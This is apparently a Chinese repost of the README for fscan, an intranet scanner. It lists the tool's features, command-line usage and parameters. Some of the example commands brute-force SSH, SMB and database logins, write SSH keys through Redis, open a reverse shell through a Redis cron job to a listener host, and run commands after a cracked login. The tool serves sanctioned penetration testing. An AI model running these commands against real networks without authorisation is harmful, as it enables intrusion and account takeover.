关于ide:fscan一键自动化全方位漏洞扫描的开源工具

82次阅读

共计 4025 个字符,预计需要花费 11 分钟才能阅读完成。

简介

fscan 是一个内网综合扫描工具,不便一键自动化、全方位破绽扫描。

它反对主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、打算工作反弹 shell、读取 win 网卡信息、web 指纹识别、web 破绽扫描、netbios 探测、域控辨认等性能。

源码链接:https://github.com/shadow1ng/…

次要性能

1. 信息收集:

  • 存活探测 (icmp)
  • 端口扫描

2. 爆破性能:

  • 各类服务爆破 (ssh、smb 等)
  • 数据库明码爆破 (mysql、mssql、redis、psql 等)

3. 零碎信息、破绽扫描:

  • 获取指标网卡信息
  • 高危破绽扫描 (ms17010 等)

4.Web 探测性能:

  • webtitle 探测
  • web 指纹识别 (常见 cms、oa 框架等)
  • web 破绽扫描 (weblogic、st2 等, 反对 xray 的 poc)

5. 破绽利用:

  • redis 写公钥或写打算工作
  • ssh 命令执行

6. 其余性能:

  • 文件保留

usege

简略用法

fscan.exe -h 192.168.1.1/24  (默认应用全副模块)  
fscan.exe -h 192.168.1.1/16  (B 段扫描)  

其余用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测、不保留文件、跳过 web poc 扫描)  
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)  
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 打算工作反弹 shell)  
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破胜利后,命令执行)  
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块 ssh 和端口)  
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、明码来进行爆破)  
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描后果保留门路, 默认保留在以后门路)   
fscan.exe -h 192.168.1.1/8  (A 段的 192.x.x.1 和 192.x.x.254, 不便疾速查看网段信息)  
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb 明码碰撞)  
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)  
fscan.exe -hf ip.txt  (以文件导入)  

编译命令

go build -ldflags="-s -w" -trimpath  

残缺参数

-Num int  
        poc rate (default 20)  
  -c string  
        exec command (ssh)  
  -cookie string  
        set poc cookie  
  -debug  
        debug mode will print more error info  
  -domain string  
        smb domain  
  -h string  
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12  
  -hf string  
        host file, -hs ip.txt  
  -m string  
        Select scan type ,as: -m ssh (default "all")  
  -no  
        not to save output log  
  -nopoc  
        not to scan web vul  
  -np  
        not to ping  
  -o string  
        Outputfile (default "result.txt")  
  -p string  
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")  
  -ping  
        using ping replace icmp  
  -pocname string  
        use the pocs these contain pocname, -pocname weblogic  
  -proxy string  
        set poc proxy, -proxy http://127.0.0.1:8080  
  -pwd string  
        password  
  -pwdf string  
        password file  
  -rf string  
        redis file to write sshkey file (as: -rf id_rsa.pub)  
  -rs string  
        redis shell to write cron file (as: -rs 192.168.1.1:6666)  
  -t int  
        Thread nums (default 600)  
  -time int  
        Set timeout (default 3)  
  -u string  
        url  
  -uf string  
        urlfile  
  -user string  
        username  
  -userf string  
        username file  
  -wt int  
        Set web timeout (default 5)  

运行截图

fscan.exe -h 192.168.x.x  (全功能、ms17010、读取网卡信息)

fscan.exe -h 192.168.x.x -rf id\_rsa.pub (redis 写公钥)

fscan.exe -h 192.168.x.x -c “whoami;id” (ssh 命令)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键反对 xray 的 poc

这个我的项目的开发者参考的开源我的项目有这些:

  • https://github.com/Adminisme/…
  • https://github.com/netxfly/x-…
  • https://github.com/hack2fun/G…
  • https://github.com/k8gege/Lad…
  • https://github.com/jjf012/gopoc

开源前哨 日常分享热门、乏味和实用的开源我的项目。参加保护 10 万 + Star 的开源技术资源库,包含:Python、Java、C/C++、Go、JS、CSS、Node.js、PHP、.NET 等。

正文完
 0